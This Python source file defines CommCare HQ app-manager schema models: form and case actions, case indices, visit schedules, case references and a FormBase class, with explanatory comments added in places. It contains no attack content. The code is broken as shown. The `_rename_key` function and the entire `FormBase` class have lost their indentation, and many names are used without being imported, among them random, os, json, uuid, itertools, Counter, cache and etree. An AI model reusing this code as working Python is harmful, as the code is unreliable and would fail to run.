from django.db import models
from couchdbkit.exceptions import BadValueError
from corehq.apps.app_manager.app_schemas.case_properties import (
get_all_case_properties,
get_parent_type_map,
get_usercase_properties,
)
from corehq.apps.app_manager.detail_screen import PropertyXpathGenerator
from corehq.apps.integration.models import ApplicationIntegrationMixin
from corehq.apps.linked_domain.applications import get_master_app_version, get_latest_master_app_release
from corehq.apps.app_manager.helpers.validators import (
ApplicationBaseValidator,
ApplicationValidator,
FormValidator,
FormBaseValidator,
IndexedFormBaseValidator,
ModuleValidator,
ModuleBaseValidator,
AdvancedModuleValidator,
AdvancedFormValidator,
ReportModuleValidator,
ShadowFormValidator,
ShadowModuleValidator,
)
from corehq.apps.app_manager.suite_xml.utils import get_select_chain
from corehq.apps.app_manager.suite_xml.generator import SuiteGenerator, MediaSuiteGenerator
from corehq.apps.app_manager.xpath_validator import validate_xpath
from corehq.apps.data_dictionary.util import get_case_property_description_dict
from corehq.apps.linked_domain.exceptions import ActionNotPermitted
from corehq.apps.userreports.exceptions import ReportConfigurationNotFoundError
from corehq.apps.userreports.util import get_static_report_mapping
from corehq.apps.users.dbaccessors.couch_users import get_display_name_for_user_id
from corehq.util.python_compatibility import soft_assert_type_text
from corehq.util.timer import TimingContext, time_method
from corehq.util.timezones.utils import get_timezone_for_domain
from dimagi.ext.couchdbkit import (
BooleanProperty,
DateTimeProperty,
DecimalProperty,
DictProperty,
Document,
DocumentSchema,
FloatProperty,
IntegerProperty,
ListProperty,
SchemaDictProperty,
SchemaListProperty,
SchemaProperty,
StringListProperty,
StringProperty,
)
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.urls import reverse
from django.template.loader import render_to_string
from couchdbkit import ResourceNotFound
from corehq import toggles, privileges
from corehq.blobs.mixin import BlobMixin, CODES
from corehq.const import USER_DATE_FORMAT, USER_TIME_FORMAT
from corehq.apps.app_manager.feature_support import CommCareFeatureSupportMixin
from corehq.apps.app_manager.tasks import prune_auto_generated_builds
from corehq.util.quickcache import quickcache
from corehq.util.soft_assert import soft_assert
from corehq.util.timezones.conversions import ServerTime
from dimagi.utils.couch import CriticalSection
from django_prbac.exceptions import PermissionDenied
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.commcare_settings import check_condition
from corehq.apps.app_manager.const import *
from corehq.apps.app_manager.const import USERCASE_TYPE
from corehq.apps.app_manager.xpath import (
dot_interpolate,
interpolate_xpath,
)
from corehq.apps.builds.utils import get_default_build_spec
from dimagi.utils.couch.undo import DeleteRecord, DELETED_SUFFIX
from dimagi.utils.dates import DateSpan
from memoized import memoized
from dimagi.utils.web import get_url_base, parse_int
from corehq.util import bitly
from corehq.util import view_utils
from corehq.apps.appstore.models import SnapshotMixin
from corehq.apps.builds.models import BuildSpec, BuildRecord
from corehq.apps.hqmedia.models import (
ApplicationMediaMixin,
CommCareMultimedia,
FormMediaMixin,
ModuleMediaMixin,
)
from corehq.apps.translations.models import TranslationMixin
from corehq.apps.users.util import cc_user_domain
from corehq.apps.domain.models import cached_property, Domain
from corehq.apps.app_manager import current_builds, app_strings, remote_app, \
id_strings, commcare_settings
from corehq.apps.app_manager.suite_xml import xml_models as suite_models
from corehq.apps.app_manager.dbaccessors import (
get_app,
get_latest_build_doc,
get_latest_released_app_doc,
domain_has_apps,
)
from corehq.apps.app_manager.util import (
save_xform,
is_usercase_in_use,
actions_use_usercase,
update_form_unique_ids,
get_correct_app_class,
get_and_assert_practice_user_in_domain,
LatestAppInfo,
update_report_module_ids,
module_offers_search,
get_latest_enabled_build_for_profile,
get_latest_enabled_versions_per_profile,
)
from corehq.apps.app_manager.xform import XForm, parse_xml as _parse_xml, \
validate_xform
from corehq.apps.app_manager.templatetags.xforms_extras import trans
from corehq.apps.app_manager.exceptions import (
AppEditingError,
FormNotFoundException,
IncompatibleFormTypeException,
ModuleNotFoundException,
ModuleIdMissingException,
RearrangeError,
SuiteValidationError,
VersioningError,
XFormException,
XFormIdNotUnique,
XFormValidationError,
ScheduleError,
XFormValidationFailed,
PracticeUserException)
from corehq.apps.reports.daterange import get_daterange_start_end_dates, get_simple_dateranges
from jsonpath_rw import jsonpath, parse
import six
from six.moves import filter
from six.moves import range
from six.moves import map
from io import open
# The four case/referral detail screen type identifiers (short and long variants).
DETAIL_TYPES = ['case_short', 'case_long', 'ref_short', 'ref_long']
# Separator between a format prefix and a field name in detail columns.
FIELD_SEPARATOR = ':'
# Matches attachment names that contain no '/' and end in '.xml'
# (i.e. top-level form XML attachments).
ATTACHMENT_REGEX = r'[^/]*\.xml'
# Maps HQ logo slugs to the CommCare Android profile property names.
ANDROID_LOGO_PROPERTY_MAPPING = {
    'hq_logo_android_home': 'brand-banner-home',
    'hq_logo_android_login': 'brand-banner-login',
    'hq_logo_android_demo': 'brand-banner-home-demo',
}
# Sentinel values presumably meaning "track the latest APK / app version" --
# confirm against usages elsewhere in this module.
LATEST_APK_VALUE = 'latest'
LATEST_APP_VALUE = 0
# Soft-assert helper; recipient address assembled via format() rather than written literally.
_soft_assert = soft_assert(to="{}@{}.com".format('npellegrino', 'dimagi'), exponential_backoff=True)
def jsonpath_update(datum_context, value):
    """Write ``value`` into the parent object at the field named by the match's path."""
    target_field = datum_context.path.fields[0]
    parent_match = jsonpath.Parent().find(datum_context)[0]
    parent_match.value[target_field] = value
# store a list of references to form ID's so that
# when an app is copied we can update the references
# with the new values
# (entries are parsed jsonpath expressions, appended by FormIdProperty below)
form_id_references = []
def FormIdProperty(expression, **kwargs):
    """
    Create a StringProperty that references a form ID. This is necessary because
    form IDs change when apps are copied so we need to make sure we update
    any references to the them.

    :param expression: jsonpath expression that can be used to find the field
    :param kwargs: arguments to be passed to the underlying StringProperty
    """
    parsed = parse(expression)
    # module-definition-time sanity checks on the expression shape
    assert isinstance(parsed, jsonpath.Child), "only child path expressions are supported"
    target = parsed.right
    assert len(target.fields) == 1, 'path expression can only reference a single field'
    # remember the expression so form-id rewriting can find this property later
    form_id_references.append(parsed)
    return StringProperty(**kwargs)
def _rename_key(dct, old, new):
if old in dct:
if new in dct and dct[new]:
dct["%s_backup_%s" % (new, hex(random.getrandbits(32))[2:-1])] = dct[new]
dct[new] = dct[old]
del dct[old]
def app_template_dir(slug):
    """Return the path to the bundled template-app directory for ``slug``."""
    base_dir = os.path.dirname(__file__)
    return os.path.join(base_dir, 'static', 'app_manager', 'template_apps', slug)
@memoized
def load_app_template(slug):
    """Read and parse the bundled ``app.json`` for the given template slug (memoized)."""
    template_path = os.path.join(app_template_dir(slug), 'app.json')
    with open(template_path) as f:
        return json.load(f)
class IndexedSchema(DocumentSchema):
    """
    Abstract class.
    Meant for documents that appear in a list within another document
    and need to know their own position within that list.
    """

    def with_id(self, i, parent):
        # Attach positional context; returns self so the call can be chained.
        self._i = i
        self._parent = parent
        return self

    @property
    def id(self):
        # Position of this document within its parent's list (set by with_id).
        return self._i

    def __eq__(self, other):
        # Equal iff both sit at the same index under the same parent.
        # NOTE(review): no matching __hash__ is defined here; whatever hashing
        # DocumentSchema provides still applies -- confirm before using these
        # as dict keys or set members.
        return (
            other and isinstance(other, IndexedSchema)
            and (self.id == other.id)
            and (self._parent == other._parent)
        )

    class Getter(object):
        """Descriptor: ``Getter('attr')`` behaves like a bound method that
        yields each item of ``instance.attr`` wrapped via ``with_id``."""

        def __init__(self, attr):
            self.attr = attr

        def __call__(self, instance):
            items = getattr(instance, self.attr)
            l = len(items)
            for i, item in enumerate(items):
                # i % l == i here, since enumerate keeps i < l; the modulo is a no-op.
                yield item.with_id(i % l, instance)

        def __get__(self, instance, owner):
            # thanks, http://metapython.blogspot.com/2010/11/python-instance-methods-how-are-they.html
            # this makes Getter('foo') act like a bound method
            return types.MethodType(self, instance)
class FormActionCondition(DocumentSchema):
    """
    The condition under which to open/update/close a case/referral

    Either {'type': 'if', 'question': '/xpath/to/node', 'answer': 'value'}
    in which case the action takes place if question has answer answer,
    or {'type': 'always'} in which case the action always takes place.
    """
    type = StringProperty(choices=["if", "always", "never"], default="never")
    question = StringProperty()
    answer = StringProperty()
    # how `question` is compared to `answer` when type == 'if'
    operator = StringProperty(choices=['=', 'selected', 'boolean_true'], default='=')

    def is_active(self):
        # 'never' (the default) deactivates the owning action entirely
        return self.type in ('if', 'always')
class FormAction(DocumentSchema):
    """
    Corresponds to Case XML
    """
    condition = SchemaProperty(FormActionCondition)

    def is_active(self):
        return self.condition.is_active()

    @classmethod
    def get_action_paths(cls, action):
        """Yield every question path referenced by ``action`` (condition plus properties)."""
        if action.condition.type == 'if':
            yield action.condition.question
        for __, path in cls.get_action_properties(action):
            yield path

    @classmethod
    def get_action_properties(cls, action):
        """Yield ``(case_property_name, question_path)`` pairs for ``action``.

        Duck-typed across the various action schemas: only the attributes an
        action actually declares are inspected. Note ``preload`` items are
        stored as (path, name) and yielded reversed as (name, path).

        Fixed: the first parameter of this classmethod was misleadingly named
        ``self``; renamed to ``cls`` for consistency with ``get_action_paths``.
        """
        action_properties = action.properties()
        if 'name_path' in action_properties and action.name_path:
            yield 'name', action.name_path
        if 'case_name' in action_properties:
            yield 'name', action.case_name
        if 'external_id' in action_properties and action.external_id:
            yield 'external_id', action.external_id
        if 'update' in action_properties:
            for name, path in action.update.items():
                yield name, path
        if 'case_properties' in action_properties:
            for name, path in action.case_properties.items():
                yield name, path
        if 'preload' in action_properties:
            for path, name in action.preload.items():
                yield name, path
class UpdateCaseAction(FormAction):
    # maps case property name -> question path supplying the value
    # (see FormAction.get_action_properties, which yields update items as (name, path))
    update = DictProperty()
class PreloadAction(FormAction):
    # maps question path -> case property to load into it; note the reversed
    # orientation vs. UpdateCaseAction.update (FormAction.get_action_properties
    # iterates preload items as (path, name) and yields them as (name, path))
    preload = DictProperty()

    def is_active(self):
        # active only when at least one preload mapping is configured
        return bool(self.preload)
class UpdateReferralAction(FormAction):
    """Referral update action; builds the follow-up date XPath expression."""
    followup_date = StringProperty()

    def get_followup_date(self):
        # No configured date -> default to two days from today.
        if not self.followup_date:
            return "date(today() + 2)"
        # Clamp configured dates that are already in the past to today + 2.
        return "if(date({followup_date}) >= date(today()), {followup_date}, date(today() + 2))".format(
            followup_date=self.followup_date,
        )
class OpenReferralAction(UpdateReferralAction):
    # question path supplying the referral's name
    name_path = StringProperty()
class OpenCaseAction(FormAction):
    # question path supplying the new case's name
    name_path = StringProperty()
    external_id = StringProperty()
class OpenSubCaseAction(FormAction, IndexedSchema):
    """Action that opens a child/extension case from within a form."""
    case_type = StringProperty()
    # question path supplying the subcase's name
    case_name = StringProperty()
    reference_id = StringProperty()
    # maps case property name -> question path
    case_properties = DictProperty()
    # path of the repeat group this subcase is opened in, if any
    repeat_context = StringProperty()
    # relationship = "child" for index to a parent case (default)
    # relationship = "extension" for index to a host case
    relationship = StringProperty(choices=['child', 'extension'], default='child')
    close_condition = SchemaProperty(FormActionCondition)

    @property
    def form_element_name(self):
        # self.id is this action's position in the subcases list (IndexedSchema)
        return 'subcase_{}'.format(self.id)
class FormActions(DocumentSchema):
    """All case/referral actions configured on a (basic) form."""
    open_case = SchemaProperty(OpenCaseAction)
    update_case = SchemaProperty(UpdateCaseAction)
    close_case = SchemaProperty(FormAction)
    open_referral = SchemaProperty(OpenReferralAction)
    update_referral = SchemaProperty(UpdateReferralAction)
    close_referral = SchemaProperty(FormAction)
    case_preload = SchemaProperty(PreloadAction)
    referral_preload = SchemaProperty(PreloadAction)
    load_from_form = SchemaProperty(PreloadAction)  # DEPRECATED
    usercase_update = SchemaProperty(UpdateCaseAction)
    usercase_preload = SchemaProperty(PreloadAction)
    subcases = SchemaListProperty(OpenSubCaseAction)

    get_subcases = IndexedSchema.Getter('subcases')

    def all_property_names(self):
        """Return the set of every case property name touched by this form's actions."""
        names = set(self.update_case.update.keys())
        names |= set(self.case_preload.preload.values())
        for subcase_action in self.subcases:
            names |= set(subcase_action.case_properties.keys())
        return names

    def count_subcases_per_repeat_context(self):
        """Count subcase-open actions grouped by their repeat context."""
        return Counter(action.repeat_context for action in self.subcases)
class CaseIndex(DocumentSchema):
    """An index from one case action to another (parent/host case tag)."""
    tag = StringProperty()
    reference_id = StringProperty(default='parent')
    relationship = StringProperty(choices=['child', 'extension', 'question'], default='child')
    # if relationship is 'question', this is the question path
    # question's response must be either "child" or "extension"
    relationship_question = StringProperty(default='')
class AdvancedAction(IndexedSchema):
    """Base schema for advanced-form case actions (load/update and open)."""
    case_type = StringProperty()
    case_tag = StringProperty()
    # maps case property name -> question path
    case_properties = DictProperty()
    # case_indices = NotImplemented

    close_condition = SchemaProperty(FormActionCondition)

    # IndexedSchema overrides __eq__; restore DocumentSchema's equality semantics here
    __eq__ = DocumentSchema.__eq__

    def get_paths(self):
        # question paths written to case properties ...
        for path in self.case_properties.values():
            yield path
        # ... plus the close-condition question, when conditional
        if self.close_condition.type == 'if':
            yield self.close_condition.question

    def get_property_names(self):
        return set(self.case_properties.keys())

    @property
    def is_subcase(self):
        # case_indices is supplied by subclasses (see NotImplemented note above)
        return bool(self.case_indices)

    @property
    def form_element_name(self):
        return "case_{}".format(self.case_tag)
class AutoSelectCase(DocumentSchema):
    """
    Configuration for auto-selecting a case.
    Attributes:
        value_source    Reference to the source of the value. For mode = fixture,
                        this represents the FixtureDataType ID. For mode = case
                        this represents the 'case_tag' for the case.
                        The modes 'user' and 'raw' don't require a value_source.
        value_key       The actual field that contains the case ID. Can be a case
                        index or a user data key or a fixture field name or the raw
                        xpath expression.
    """
    mode = StringProperty(choices=[AUTO_SELECT_USER,
                                   AUTO_SELECT_FIXTURE,
                                   AUTO_SELECT_CASE,
                                   AUTO_SELECT_USERCASE,
                                   AUTO_SELECT_RAW])
    value_source = StringProperty()
    value_key = StringProperty(required=True)
class LoadCaseFromFixture(DocumentSchema):
    """
    fixture_nodeset:      nodeset that returns the fixture options to display
    fixture_tag:          id of session datum where the result of user selection
                          will be stored
    fixture_variable:     value from the fixture to store from the selection
    auto_select_fixture:  boolean to autoselect the value if the nodeset only
                          returns 1 result
    case_property:        case property to filter on
    arbitrary_datum_*:    adds an arbitrary datum with function before the action
    """
    fixture_nodeset = StringProperty()
    fixture_tag = StringProperty()
    fixture_variable = StringProperty()
    auto_select_fixture = BooleanProperty(default=False)
    case_property = StringProperty(default='')
    auto_select = BooleanProperty(default=False)
    arbitrary_datum_id = StringProperty()
    arbitrary_datum_function = StringProperty()
class LoadUpdateAction(AdvancedAction):
    """
    details_module:           Use the case list configuration from this module to show the cases.
    preload:                  Value from the case to load into the form. Keys are question paths,
                              values are case properties.
    auto_select:              Configuration for auto-selecting the case
    load_case_from_fixture:   Configuration for loading a case using fixture data
    show_product_stock:       If True list the product stock using the module's Product List
                              configuration.
    product_program:          Only show products for this CommCare Supply program.
    case_index:               Used when a case should be created/updated as a child or extension case
                              of another case.
    """
    details_module = StringProperty()
    preload = DictProperty()
    auto_select = SchemaProperty(AutoSelectCase, default=None)
    load_case_from_fixture = SchemaProperty(LoadCaseFromFixture, default=None)
    show_product_stock = BooleanProperty(default=False)
    product_program = StringProperty()
    case_index = SchemaProperty(CaseIndex)

    @property
    def case_indices(self):
        # Allows us to ducktype AdvancedOpenCaseAction
        return [self.case_index] if self.case_index.tag else []

    @case_indices.setter
    def case_indices(self, value):
        # a load/update action supports at most one index
        if len(value) > 1:
            raise ValueError('A LoadUpdateAction cannot have more than one case index')
        if value:
            self.case_index = value[0]
        else:
            self.case_index = CaseIndex()

    @case_indices.deleter
    def case_indices(self):
        self.case_index = CaseIndex()

    def get_paths(self):
        # parent paths plus the question paths case data is preloaded into
        for path in super(LoadUpdateAction, self).get_paths():
            yield path
        for path in self.preload.keys():
            yield path

    def get_property_names(self):
        # parent names plus the case properties that get preloaded
        names = super(LoadUpdateAction, self).get_property_names()
        names.update(list(self.preload.values()))
        return names

    @property
    def case_session_var(self):
        return 'case_id_{0}'.format(self.case_tag)

    @classmethod
    def wrap(cls, data):
        # migrate legacy flat parent_tag/parent_reference_id/relationship
        # fields into the nested case_index document
        if 'parent_tag' in data:
            if data['parent_tag']:
                data['case_index'] = {
                    'tag': data['parent_tag'],
                    'reference_id': data.get('parent_reference_id', 'parent'),
                    'relationship': data.get('relationship', 'child')
                }
            del data['parent_tag']
            data.pop('parent_reference_id', None)
            data.pop('relationship', None)
        return super(LoadUpdateAction, cls).wrap(data)
class AdvancedOpenCaseAction(AdvancedAction):
    """Advanced-form action that opens a new case (optionally inside a repeat)."""
    # question path supplying the new case's name
    name_path = StringProperty()
    # path of the repeat group this case is opened in, if any
    repeat_context = StringProperty()
    case_indices = SchemaListProperty(CaseIndex)

    open_condition = SchemaProperty(FormActionCondition)

    def get_paths(self):
        # parent paths, plus the name question, plus the open-condition question
        for path in super(AdvancedOpenCaseAction, self).get_paths():
            yield path
        yield self.name_path
        if self.open_condition.type == 'if':
            yield self.open_condition.question

    @property
    def case_session_var(self):
        # self.id is this action's position in the open_cases list (IndexedSchema)
        return 'case_id_new_{}_{}'.format(self.case_type, self.id)

    @classmethod
    def wrap(cls, data):
        # migrate legacy flat parent_tag/parent_reference_id/relationship
        # fields into an entry of the case_indices list
        if 'parent_tag' in data:
            if data['parent_tag']:
                index = {
                    'tag': data['parent_tag'],
                    'reference_id': data.get('parent_reference_id', 'parent'),
                    'relationship': data.get('relationship', 'child')
                }
                # append when case_indices is already list-like, else create it
                if hasattr(data.get('case_indices'), 'append'):
                    data['case_indices'].append(index)
                else:
                    data['case_indices'] = [index]
            del data['parent_tag']
            data.pop('parent_reference_id', None)
            data.pop('relationship', None)
        return super(AdvancedOpenCaseAction, cls).wrap(data)
class AdvancedFormActions(DocumentSchema):
    """Actions on an advanced form: cases to load/update and cases to open."""
    load_update_cases = SchemaListProperty(LoadUpdateAction)
    open_cases = SchemaListProperty(AdvancedOpenCaseAction)

    get_load_update_actions = IndexedSchema.Getter('load_update_cases')
    get_open_actions = IndexedSchema.Getter('open_cases')

    def get_all_actions(self):
        # load/update actions first, then open actions
        return itertools.chain(self.get_load_update_actions(), self.get_open_actions())

    def get_subcase_actions(self):
        # actions that index another case (i.e. create/update a child or extension)
        return (a for a in self.get_all_actions() if a.case_indices)

    def get_open_subcase_actions(self, parent_case_type=None):
        """Yield open actions that have case indices; when ``parent_case_type``
        is given, only those indexing an action of that case type."""
        for action in self.open_cases:
            if action.case_indices:
                if not parent_case_type:
                    yield action
                else:
                    if any(self.actions_meta_by_tag[case_index.tag]['action'].case_type == parent_case_type
                           for case_index in action.case_indices):
                        yield action

    def get_case_tags(self):
        for action in self.get_all_actions():
            yield action.case_tag

    def get_action_from_tag(self, tag):
        # returns None when the tag is unknown
        return self.actions_meta_by_tag.get(tag, {}).get('action', None)

    @property
    def actions_meta_by_tag(self):
        return self._action_meta()['by_tag']

    @property
    def actions_meta_by_parent_tag(self):
        return self._action_meta()['by_parent_tag']

    @property
    def auto_select_actions(self):
        return self._action_meta()['by_auto_select_mode']

    @memoized
    def _action_meta(self):
        """Build lookup tables over all actions: by case tag, by parent tag,
        and load actions grouped by auto-select mode."""
        meta = {
            'by_tag': {},
            'by_parent_tag': {},
            'by_auto_select_mode': {
                AUTO_SELECT_USER: [],
                AUTO_SELECT_CASE: [],
                AUTO_SELECT_FIXTURE: [],
                AUTO_SELECT_USERCASE: [],
                AUTO_SELECT_RAW: [],
            }
        }

        def add_actions(type, action_list):
            # NOTE: `type` shadows the builtin within this helper
            for action in action_list:
                meta['by_tag'][action.case_tag] = {
                    'type': type,
                    'action': action
                }
                for parent in action.case_indices:
                    meta['by_parent_tag'][parent.tag] = {
                        'type': type,
                        'action': action
                    }
                # only load actions carry auto_select configuration
                if type == 'load' and action.auto_select and action.auto_select.mode:
                    meta['by_auto_select_mode'][action.auto_select.mode].append(action)

        add_actions('load', self.get_load_update_actions())
        add_actions('open', self.get_open_actions())
        return meta

    def count_subcases_per_repeat_context(self):
        # count subcase-open actions grouped by their repeat context
        return Counter([action.repeat_context for action in self.get_open_subcase_actions()])
class FormSource(object):
    """Descriptor backing ``FormBase.source``: the form's XForm XML, stored as
    an app attachment named ``<unique_id>.xml``."""

    def __get__(self, form, form_cls):
        if not form:
            # accessed on the class, not an instance
            return self
        unique_id = form.get_unique_id()
        app = form.get_app()
        filename = "%s.xml" % unique_id

        # for backwards compatibility of really old apps
        try:
            old_contents = form['contents']
        except AttributeError:
            pass
        else:
            # migrate legacy inline 'contents' into the attachment, then drop it
            app.lazy_put_attachment(old_contents.encode('utf-8'), filename)
            del form['contents']

        if not app.has_attachment(filename):
            source = ''
        else:
            source = app.lazy_fetch_attachment(filename)
            if isinstance(source, bytes):
                source = source.decode('utf-8')
            else:
                # attachments are expected to come back as bytes; flag anything else
                _soft_assert(False, type(source))

        return source

    def __set__(self, form, value):
        unique_id = form.get_unique_id()
        app = form.get_app()
        filename = "%s.xml" % unique_id
        if isinstance(value, six.text_type):
            value = value.encode('utf-8')
        else:
            # callers are expected to pass text; flag anything else
            _soft_assert(False, type(value))
        app.lazy_put_attachment(value, filename)
        form.clear_validation_cache()
        try:
            form.xmlns = form.wrapped_xform().data_node.tag_xmlns
        except Exception:
            # unparseable XML: leave xmlns unset rather than fail the assignment
            form.xmlns = None
class CachedStringProperty(object):
    """Descriptor storing a per-instance string in the shared cache.

    ``key`` is a callable mapping the owning instance to its cache key.
    """

    def __init__(self, key):
        self.get_key = key

    def __get__(self, instance, owner):
        cache_key = self.get_key(instance)
        return self.get(cache_key)

    def __set__(self, instance, value):
        cache_key = self.get_key(instance)
        self.set(cache_key, value)

    @classmethod
    def get(cls, key):
        return cache.get(key)

    @classmethod
    def set(cls, key, value):
        # cache for 7 days
        cache.set(key, value, 7 * 24 * 60 * 60)
class ScheduleVisit(IndexedSchema):
    """
    due:         Days after the anchor date that this visit is due
    starts:      Days before the due date that this visit is valid from
    expires:     Days after the due date that this visit is valid until (optional)
    repeats:     Whether this is a repeat visit (one per form allowed)
    increment:   Days after the last visit that the repeat visit occurs
    """
    due = IntegerProperty()
    starts = IntegerProperty()
    expires = IntegerProperty()
    repeats = BooleanProperty(default=False)
    increment = IntegerProperty()

    @property
    def id(self):
        """Visits are 1-based indexed"""
        # IndexedSchema.id is the 0-based list position; shift by one.
        _id = super(ScheduleVisit, self).id
        return _id + 1
class FormDatum(DocumentSchema):
    # a named session datum (name + xpath expression), used by FormLink
    name = StringProperty()
    xpath = StringProperty()
class FormLink(DocumentSchema):
    """
    xpath: xpath condition that must be true in order to open next form
    form_id: id of next form to open
    datums: session datums (name/xpath pairs) supplied to the next form
    """
    xpath = StringProperty()
    # registered via FormIdProperty so the reference is rewritten on app copy
    form_id = FormIdProperty('modules[*].forms[*].form_links[*].form_id')
    datums = SchemaListProperty(FormDatum)
class FormSchedule(DocumentSchema):
    """
    enabled: Whether this schedule is enabled
    starts: Days after the anchor date that this schedule starts
    expires: Days after the anchor date that this schedule expires (optional)
    visits: List of visits in this schedule
    allow_unscheduled: Allow unscheduled visits in this schedule
    transition_condition: Condition under which we transition to the next phase
    termination_condition: Condition under which we terminate the whole schedule
    """
    enabled = BooleanProperty(default=True)

    starts = IntegerProperty()
    expires = IntegerProperty()
    allow_unscheduled = BooleanProperty(default=False)
    visits = SchemaListProperty(ScheduleVisit)
    get_visits = IndexedSchema.Getter('visits')

    transition_condition = SchemaProperty(FormActionCondition)
    termination_condition = SchemaProperty(FormActionCondition)
class CustomAssertion(DocumentSchema):
    """Custom assertions to add to the assertions block

    test: The actual assertion to run
    text: Failure messages keyed by string (presumably locale code -- confirm
          against callers). NOTE: the original docstring documented a
          ``locale_id`` field that does not exist on this schema.
    """
    test = StringProperty(required=True)
    text = DictProperty(StringProperty)
class CustomInstance(DocumentSchema):
    """Custom instances to add to the instance block

    instance_id: The ID of the instance
    instance_path: The path where the instance can be found
    """
    instance_id = StringProperty(required=True)
    instance_path = StringProperty(required=True)
class CommentMixin(DocumentSchema):
    """
    Documentation comment for app builders and maintainers
    """
    comment = StringProperty(default='')

    @property
    def short_comment(self):
        """
        Trim comment to 500 chars (about 100 words)
        """
        full_comment = self.comment
        if len(full_comment) <= 500:
            return full_comment
        return full_comment[:497] + '...'
class CaseLoadReference(DocumentSchema):
    """
    This is the schema for a load reference that is used in validation and expected
    to be worked with when using `CaseReferences`. The format is different from the
    dict of:
    {
        'path': ['list', 'of', 'properties']
    }
    That is stored on the model and expected in Vellum, but as we add more information
    (like case types) to the load model this format will be easier to extend.
    """
    _allow_dynamic_properties = False
    path = StringProperty()
    properties = ListProperty(six.text_type)
class CaseSaveReference(DocumentSchema):
    """
    This is the schema for what Vellum writes to HQ and what is expected to be stored on the
    model (reference by a dict where the keys are paths).
    """
    _allow_dynamic_properties = False
    case_type = StringProperty()
    properties = ListProperty(six.text_type)
    create = BooleanProperty(default=False)
    close = BooleanProperty(default=False)
class CaseSaveReferenceWithPath(CaseSaveReference):
    """
    Like CaseLoadReference, this is the model that is expected to be worked with as it
    contains the complete information about the reference in a single place.
    """
    # the question path the save reference is keyed by in CaseReferences.save
    path = StringProperty()
class CaseReferences(DocumentSchema):
    """
    The case references associated with a form. This is dependent on Vellum's API that sends
    case references to HQ.

    load: dict of question path -> list of case properties (see CaseLoadReference)
    save: dict of question path -> CaseSaveReference

    All usage should go through the get_load_references / get_save_references helpers.
    """
    _allow_dynamic_properties = False
    load = DictProperty()
    save = SchemaDictProperty(CaseSaveReference)

    def validate(self, required=True):
        super(CaseReferences, self).validate()
        # force validation to run on the referenced load types,
        # since `load` is not a defined schema (yet)
        list(self.get_load_references())

    def get_load_references(self):
        """Yield a CaseLoadReference for every entry in ``load``."""
        for path, props in self.load.items():
            yield CaseLoadReference(path=path, properties=list(props))

    def get_save_references(self):
        """Yield a CaseSaveReferenceWithPath for every entry in ``save``."""
        for path, reference in self.save.items():
            reference_json = reference.to_json()
            reference_json['path'] = path
            yield CaseSaveReferenceWithPath.wrap(reference_json)
class FormBase(DocumentSchema):
"""
Part of a Managed Application; configuration for a form.
Translates to a second-level menu on the phone
"""
form_type = None
name = DictProperty(six.text_type)
unique_id = StringProperty()
show_count = BooleanProperty(default=False)
xmlns = StringProperty()
version = IntegerProperty()
source = FormSource()
validation_cache = CachedStringProperty(
lambda self: "cache-%s-%s-validation" % (self.get_app().get_id, self.unique_id)
)
post_form_workflow = StringProperty(
default=WORKFLOW_DEFAULT,
choices=ALL_WORKFLOWS
)
post_form_workflow_fallback = StringProperty(
choices=WORKFLOW_FALLBACK_OPTIONS,
default=None,
)
auto_gps_capture = BooleanProperty(default=False)
no_vellum = BooleanProperty(default=False)
form_links = SchemaListProperty(FormLink)
schedule_form_id = StringProperty()
custom_assertions = SchemaListProperty(CustomAssertion)
custom_instances = SchemaListProperty(CustomInstance)
case_references_data = SchemaProperty(CaseReferences)
is_release_notes_form = BooleanProperty(default=False)
enable_release_notes = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
data.pop('validation_cache', '')
if cls is FormBase:
doc_type = data['doc_type']
if doc_type == 'Form':
return Form.wrap(data)
elif doc_type == 'AdvancedForm':
return AdvancedForm.wrap(data)
elif doc_type == 'ShadowForm':
return ShadowForm.wrap(data)
else:
raise ValueError('Unexpected doc_type for Form', doc_type)
else:
return super(FormBase, cls).wrap(data)
@property
def case_references(self):
return self.case_references_data or CaseReferences()
def requires_case(self):
return False
def get_action_type(self):
return ''
def get_validation_cache(self):
return self.validation_cache
def set_validation_cache(self, cache):
self.validation_cache = cache
def clear_validation_cache(self):
self.set_validation_cache(None)
@property
def validator(self):
return FormBaseValidator(self)
def is_allowed_to_be_release_notes_form(self):
# checks if this form can be marked as a release_notes form
# based on whether it belongs to a training_module
# and if no other form is already marked as release_notes form
module = self.get_module()
if not module or not module.is_training_module:
return False
forms = module.get_forms()
for form in forms:
if form.is_release_notes_form and form.unique_id != self.unique_id:
return False
return True
@property
def uses_cases(self):
return (
self.requires_case()
or self.get_action_type() != 'none'
or self.form_type == 'advanced_form'
)
@case_references.setter
def case_references(self, case_references):
self.case_references_data = case_references
@classmethod
def get_form(cls, form_unique_id, and_app=False):
try:
d = Application.get_db().view(
'app_manager/xforms_index',
key=form_unique_id
).one()
except MultipleResultsFound as e:
raise XFormIdNotUnique(
"xform id '%s' not unique: %s" % (form_unique_id, e)
)
if d:
d = d['value']
else:
raise ResourceNotFound()
# unpack the dict into variables app_id, module_id, form_id
app_id, unique_id = [d[key] for key in ('app_id', 'unique_id')]
app = Application.get(app_id)
form = app.get_form(unique_id)
if and_app:
return form, app
else:
return form
def pre_delete_hook(self):
raise NotImplementedError()
def pre_move_hook(self, from_module, to_module):
""" Called before a form is moved between modules or to a different position """
raise NotImplementedError()
def wrapped_xform(self):
return XForm(self.source)
def validate_form(self):
vc = self.get_validation_cache()
if vc is None:
# todo: now that we don't use formtranslate, does this still apply?
# formtranslate requires all attributes to be valid xpaths, but
# vellum namespaced attributes aren't
form = self.wrapped_xform()
form.strip_vellum_ns_attributes()
try:
if form.xml is not None:
validate_xform(self.get_app().domain, etree.tostring(form.xml))
except XFormValidationError as e:
validation_dict = {
"fatal_error": e.fatal_error,
"validation_problems": e.validation_problems,
"version": e.version,
}
vc = json.dumps(validation_dict)
else:
vc = ""
self.set_validation_cache(vc)
if vc:
try:
raise XFormValidationError(**json.loads(vc))
except ValueError:
self.clear_validation_cache()
return self.validate_form()
return self
def is_a_disabled_release_form(self):
return self.is_release_notes_form and not self.enable_release_notes
@property
def timing_context(self):
return self.get_app().timing_context
def validate_for_build(self, validate_module=True):
return self.validator.validate_for_build(validate_module)
def get_unique_id(self):
"""
Return unique_id if it exists, otherwise initialize it
Does _not_ force a save, so it's the caller's responsibility to save the app
"""
if not self.unique_id:
self.unique_id = uuid.uuid4().hex
return self.unique_id
def get_app(self):
return self._app
def get_version(self):
return self.version if self.version else self.get_app().version
